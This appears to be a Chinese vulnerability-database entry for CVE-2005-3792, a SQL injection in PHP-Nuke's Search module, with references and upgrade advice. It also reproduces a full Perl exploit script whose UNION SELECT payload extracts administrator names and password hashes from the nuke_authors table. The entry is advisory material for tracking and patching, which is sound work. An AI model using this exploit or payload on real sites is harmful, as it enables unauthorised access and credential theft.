CVE-2005-3792
CVSS7.5
发布时间 :2005-11-24 06:03:00
修订时间 :2016-10-17 23:37:13
NMCOE    

[原文]Multiple SQL injection vulnerabilities in the Search module in PHP-Nuke 7.8, and possibly other versions before 7.9 with patch 3.1, allows remote attackers to execute arbitrary SQL commands, as demonstrated via the query parameter in a stories type.


[CNNVD]PHPNuke Search模块SQL注入漏洞(CNNVD-200511-378)

        phpnuke是一套开放源码建站程序。
        PHP-Nuke 7.8以及patch 3.1的7.9之前的其他版本中search模块内存在多个SQL注入漏洞,可让远程攻击者执行任意SQL命令.

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:francisco_burzi:php-nuke:7.2
cpe:/a:francisco_burzi:php-nuke:7.1
cpe:/a:francisco_burzi:php-nuke:7.0_final
cpe:/a:francisco_burzi:php-nuke:7.7
cpe:/a:francisco_burzi:php-nuke:7.8
cpe:/a:francisco_burzi:php-nuke:7.6
cpe:/a:francisco_burzi:php-nuke:7.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3792
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3792
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-378
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0454.html
(UNKNOWN)  FULLDISC  20051115 Critical SQL Injection PHPNuke <= 7.8
http://marc.info/?l=bugtraq&m=113210758511323&w=2
(UNKNOWN)  BUGTRAQ  20051115 Critical SQL Injection PHPNuke <= 7.8
http://securityreason.com/achievement_exploitalert/5
(UNKNOWN)  MISC  http://securityreason.com/achievement_exploitalert/5
http://securitytracker.com/id?1015215
(UNKNOWN)  SECTRACK  1015215
http://securitytracker.com/id?1015651
(UNKNOWN)  SECTRACK  1015651
http://www.securityfocus.com/archive/1/425627/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060221 Re: [waraxe-2006-SA#046] - Critical sql injection in phpNuke 7.5-7.8
http://www.securityfocus.com/archive/1/archive/1/425508/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060219 [waraxe-2006-SA#046] - Critical sql injection in phpNuke 7.5-7.8
http://www.securityfocus.com/bid/15421
(UNKNOWN)  BID  15421
http://www.vupen.com/english/advisories/2005/2446
(UNKNOWN)  VUPEN  ADV-2005-2446
http://www.waraxe.us/advisory-46.html
(UNKNOWN)  MISC  http://www.waraxe.us/advisory-46.html
http://xforce.iss.net/xforce/xfdb/23079
(UNKNOWN)  XF  phpnuke-query-sql-injection(23079)

- 漏洞信息

PHPNuke Search模块SQL注入漏洞
高危 SQL注入
2005-11-24 00:00:00 2005-11-28 00:00:00
远程  
        phpnuke是一套开放源码建站程序。
        PHP-Nuke 7.8以及patch 3.1的7.9之前的其他版本中search模块内存在多个SQL注入漏洞,可让远程攻击者执行任意SQL命令.

- 公告与补丁

        暂无数据

- 漏洞信息 (1326)

PHP-Nuke <= 7.8 Search Module Remote SQL Injection Exploit (EDBID:1326)
php webapps
2005-11-16 Verified
0 n/a
N/A [点击下载]
#!/usr/bin/perl -w
use IO::Socket;

if (@ARGV < 2)
{
print "*---------------------------------------*\n";
print "* EXPLOIT for PHPNuke <=7.8 *\n";
print "*---------------------------------------*\n\n";
print " Usage : \n";
print " PHPNuke[1] HOST /[path_phpnuke] \n\n";
print " HOST - Host where is phpnuke example: localhost \n\n";
print " Example :\n\n";
print " PHPNuke[1] www.victim.com /phpnuke/html/ \n\n";
exit();
}

$HOST = $ARGV[0];
$phpnuke_path = $ARGV[1];

print "\n";
print "Host : $HOST\n";
print "phpnuke_path : $phpnuke_path\n";
print "\n";
$OK = 0;
$modules = "modules.php";
$query = "name=Search&query=s%')/**/UNION/**/SELECT/**/0,pwd,0,aid,0,0,0,0,0,0/**/FROM/**/nuke_authors/*";
$length = length $query;
$GET = $phpnuke_path . $modules;
print "[*] Connecting at victim host [OK]\n";
$send = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "[*] Connect [FAILED]\n";
print "[*] Connected [OK]\n";
print "[*] Sending exploit [OK]\n\n";
print $send "POST ".$GET." HTTP/1.0\n";
print $send "Host: ".%HOST."\n";
print $send "Referer: http://".%HOST.$phpnuke_path."modules.php?name=Search \r\n";
print $send "User-Agent: Internet Explorer 6.0 [SR]\n";
print $send "Content-Type: application/x-www-form-urlencoded\n";
print $send "Content-Length: ".$length."\n\n";
print $send $query;
print $send "Cookie: lang=english\r\n\r\n";
print $send "Connection: close\n\n";

print "[*] Exploit send [OK]\n";
print "[*] Wait for reply...[OK]\n";
while ($answer = <$send>)
{
if ($answer =~ /=0"><b>([^:]*)<\/b>/ ) { 
$OK = 1;
print "[*] Success [OK]\n";
print "[*] USER: $1\n";
}
if ($answer =~ /=\"0">([^:]*)<\/a>/ ) { 
$OK = 1;
print "[*] PASSWORD: $1\n";
}
}
if ($OK == 0) { print "[*] Exploit [FAILED]\n"; }

# milw0rm.com [2005-11-16]
		

- 漏洞信息

20866
PHP-Nuke Search Module query Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

PHP-Nuke contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search module not properly sanitizing user-supplied input to the 'query' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2005-11-15 Unknow
2005-11-15 Unknow

- 解决方案

Upgrade to version 7.9 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站